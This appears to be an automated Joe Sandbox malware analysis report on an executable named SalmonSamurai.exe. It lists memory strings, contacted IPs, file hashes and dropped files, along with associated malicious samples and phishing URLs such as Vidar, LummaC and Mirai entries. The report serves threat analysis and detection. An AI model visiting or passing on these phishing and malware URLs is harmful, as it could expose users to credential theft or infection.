                                                                                                                                                                                          https://id.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://search.naver.com/search.naver?ie=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://doh.cleanbrowsing.org/doh/adult-filterSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
89.187.28.253 | unknown | Ukraine | 39810 | UA-WICOMWiMAXUkraineAutonomousSystemUA | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                                                                                                      IP
                                                                                                                                                                                                      192.168.2.5
                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1579955
                                                                                                                                                                                                      Start date and time:2024-12-23 17:03:20 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 10m 27s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                                                                                                      Number of analysed new started processes analysed:55
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:SalmonSamurai.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal45.winEXE@77/139@2/3
                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.251.40.195, 172.202.163.200, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • VT rate limit hit for: SalmonSamurai.exe
                                                                                                                                                                                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
172.64.41.3 | nTyPEbq9wQ.lnk | malicious | Unknown
172.64.41.3 | gVKsiQIHqe.exe | malicious | Vidar
172.64.41.3 | trZG6pItZj.exe | malicious | Vidar
172.64.41.3 | Loader.exe | malicious | RHADAMANTHYS
172.64.41.3 | Ocean-T2I4I8O9.exe | malicious | Unknown
172.64.41.3 | ktyihkdfesf.exe | malicious | Vidar
172.64.41.3 | pjthjsdjgjrtavv.exe | malicious | Vidar
172.64.41.3 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar
172.64.41.3 | RECOUVREMENT -FACTURER1184521.pdf | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
chrome.cloudflare-dns.com | https://liladelman.com/rental/1218-west-side-road-block-island/ | malicious | Unknown | 162.159.61.3
chrome.cloudflare-dns.com | Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown | 172.64.41.3
chrome.cloudflare-dns.com | nTyPEbq9wQ.lnk | malicious | Unknown | 172.64.41.3
chrome.cloudflare-dns.com | gVKsiQIHqe.exe | malicious | Vidar | 172.64.41.3
chrome.cloudflare-dns.com | trZG6pItZj.exe | malicious | Vidar | 172.64.41.3
chrome.cloudflare-dns.com | Loader.exe | malicious | RHADAMANTHYS | 162.159.61.3
chrome.cloudflare-dns.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Vidar, Xmrig | 172.64.41.3
chrome.cloudflare-dns.com | MS100384UTC.xls | malicious | Unknown | 162.159.61.3
chrome.cloudflare-dns.com | SWIFT.xls | malicious | Unknown | 162.159.61.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | MT Eagle Asia 11.exe | malicious | Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | Payout Receipts.pptx | malicious | HTMLPhisher | 104.18.95.41
CLOUDFLARENETUS | http://tax-com.com | malicious | Unknown | 172.67.203.198
CLOUDFLARENETUS | https://www.cocol88.site/l6v3z.php | malicious | Unknown | 104.21.63.207
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.95.235
CLOUDFLARENETUS | file.exe | malicious | FormBook | 104.21.40.196
CLOUDFLARENETUS | https://laimilano.powerappsportals.com/ | malicious | Unknown | 104.21.22.164
UA-WICOMWiMAXUkraineAutonomousSystemUA | https://prosayverso.com.ar/BM2kli2PnglFe5rx0qi2PNk17Fe5RSNAs3RKdy9fr | malicious | HTMLPhisher | 89.187.28.95
UA-WICOMWiMAXUkraineAutonomousSystemUA | https://www.serserijeans.com/kdy9bFe5glari2Px0qak17sdy9nFe5k17 | malicious | Unknown | 89.187.28.219
UA-WICOMWiMAXUkraineAutonomousSystemUA | https://www.maultalk.com/url.php?to=https://www.serserijeans.com/gdy9haBM2BM2Fe5rss3RhBM2i2Pdk17x0qvi2PFe5nnaai2PrpWO3rk17dy9s3RWO3BM2 | malicious | Unknown | 89.187.28.219
UA-WICOMWiMAXUkraineAutonomousSystemUA | https://fahrerdokument.com/zip3/ | malicious | Vidar | 89.187.28.179
UA-WICOMWiMAXUkraineAutonomousSystemUA | https://forum.fontlab.com/index.php?thememode=full;redirect=https://ags.college/D5Qw4GQ3Ea4RAy2APw4GloTxB4GalP21z01coTxm | malicious | HTMLPhisher | 89.187.28.92
UA-WICOMWiMAXUkraineAutonomousSystemUA | EEad1s92K0.elf | malicious | Mirai | 89.187.3.90
UA-WICOMWiMAXUkraineAutonomousSystemUA | C6ego4oO3t.elf | malicious | Mirai | 89.187.3.81
                                                                                                                                                                                                                        No context
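Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | NativeApp_G5L1NHZZ.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | AyqwnIUrcz.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | nanophanotool.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | 9VbeqQbgU4.exe | malicious | RedLine, SectopRAT
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | 9VbeqQbgU4.exe | malicious | RedLine, SectopRAT
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | ivySCI-5.6.3.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | ivySCI-5.6.3.exe | malicious | Unknown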
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):3008
                                                                                                                                                                                                                                          Entropy (8bit):5.43001359394195
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:FizsSU4y4RQmFoUeCamfm9qr9t5/78NQffii+RlxJZaxIZVEouNHJBVrHLj/jCVb:FizlHyIFKL2O9qrh7KWKjJlPEo2drXk
                                                                                                                                                                                                                                          MD5:CB2EF1217DA37F608E2BAA5674B60219
                                                                                                                                                                                                                                          SHA1:03F4BF75AE213AA01644B1920B803A34DFAEB4C3
                                                                                                                                                                                                                                          SHA-256:C949313791CD314DD4AED678C5355B2428AD9D8E1E4771BAAA4784E538558DF8
                                                                                                                                                                                                                                          SHA-512:6A15A94FAB426FC725CFDD9717E5A496BD6E0FCEC09165A84B59B906886F89301AE82CDB990D7A0297222B4755853A572A501BDD13F19EB60E385A130BF8CEFA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:@...e.................................Z.J.......................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 35184388866048.000000
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):246294845
                                                                                                                                                                                                                                          Entropy (8bit):6.95746554896744
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1572864:KLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj3:KypCmJctBjj2+JvFg+E2XdWU1Qt3
                                                                                                                                                                                                                                          MD5:42259B63C8D2B564557504B587E86073
                                                                                                                                                                                                                                          SHA1:E0B53769C0E3B0F296C9C94AC37F81800145A46B
                                                                                                                                                                                                                                          SHA-256:36485E67930FFF7A6F7E0E3156FD01817FEE62116B5E7E5257C4F2BC057CD779
                                                                                                                                                                                                                                          SHA-512:DB22AC07FB203B5009DA15D360A7F555FFD50D66C933F40E148B47FA5A986D976ACF11888D1FF2F31DB025FB94B1DE01C506F06EC142BB0A5707ED02E1C63647
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1096
                                                                                                                                                                                                                                          Entropy (8bit):5.13006727705212
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                                                                          MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                                                                          SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                                                                          SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                                                                          SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8312662
                                                                                                                                                                                                                                          Entropy (8bit):4.705814170451806
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                                                                                          MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                                                                                          SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                                                                                          SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                                                                                          SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):160143360
                                                                                                                                                                                                                                          Entropy (8bit):6.741790865491727
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1572864:mLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:mypCmJctBjj2+Jv
                                                                                                                                                                                                                                          MD5:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          SHA1:9EAC8A0CED4B353D3E1B17A3D844255FDCC14667
                                                                                                                                                                                                                                          SHA-256:40ABBA1E7DA7B3EAAD08A6E3BE381A9FC2AB01B59638912029BC9A4AA1E0C7A7
                                                                                                                                                                                                                                          SHA-512:757B1CA6D1BD47DE3CDAA5343E115CC4F35078FF450E99AD6DA879F7614E35D57600997D2F830777E965F901C6A61BB7888700B7547730B5C4C4C5F7A44603B0
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...8.......F.........@..........................................`...........................................+.. ..0"..h.......`....Pt.._@..........0.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc...`............xz.............@..@.reloc......0........|.............@..B................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):127125
                                                                                                                                                                                                                                          Entropy (8bit):7.915612661029362
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                                                                                          MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                                                                                          SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                                                                                          SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                                                                                          SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):177406
                                                                                                                                                                                                                                          Entropy (8bit):7.939611912805236
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                                                                                          MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                                                                                          SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                                                                                          SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                                                                                          SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4916712
                                                                                                                                                                                                                                          Entropy (8bit):6.398049523846958
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                                                                                          MD5:2191E768CC2E19009DAD20DC999135A3
